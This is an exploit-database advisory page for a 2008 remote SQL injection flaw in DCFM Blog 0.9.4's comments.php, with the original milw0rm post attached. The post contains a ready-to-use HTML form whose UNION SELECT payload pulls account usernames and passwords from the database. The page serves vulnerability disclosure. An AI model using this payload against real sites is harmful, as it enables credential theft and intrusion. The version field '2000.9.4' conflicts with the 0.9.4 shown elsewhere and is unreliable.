header-logo
Suggest Exploit
vendor:
DCFM Blog
by:
unohope
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DCFM Blog
Affected Version From: 2000.9.4
Affected Version To: 2000.9.4
Patch Exists: NO
Related CWE: N/A
CPE: a:dcfm_blog:dcfm_blog:0.9.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in DCFM Blog 0.9.4. An attacker can send a specially crafted HTTP POST request to the comments.php script with an input containing malicious SQL statements to execute arbitrary SQL commands on the underlying database.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: DCFM Blog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/dcfm-blog/blog_files_0-9-4.zip

Mirror ======:: http://www.badongo.com/file/9630703

______________________
[SQL Injection]

- {comments.php} -

<form action="http://localhost/dcfmblog/comments.php" method="post">
  <input type="text" name="id" size=50 value="-99' union select 0,username,password from accounts where id=1/*">
  <input type="submit" value=" send ">
</form>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]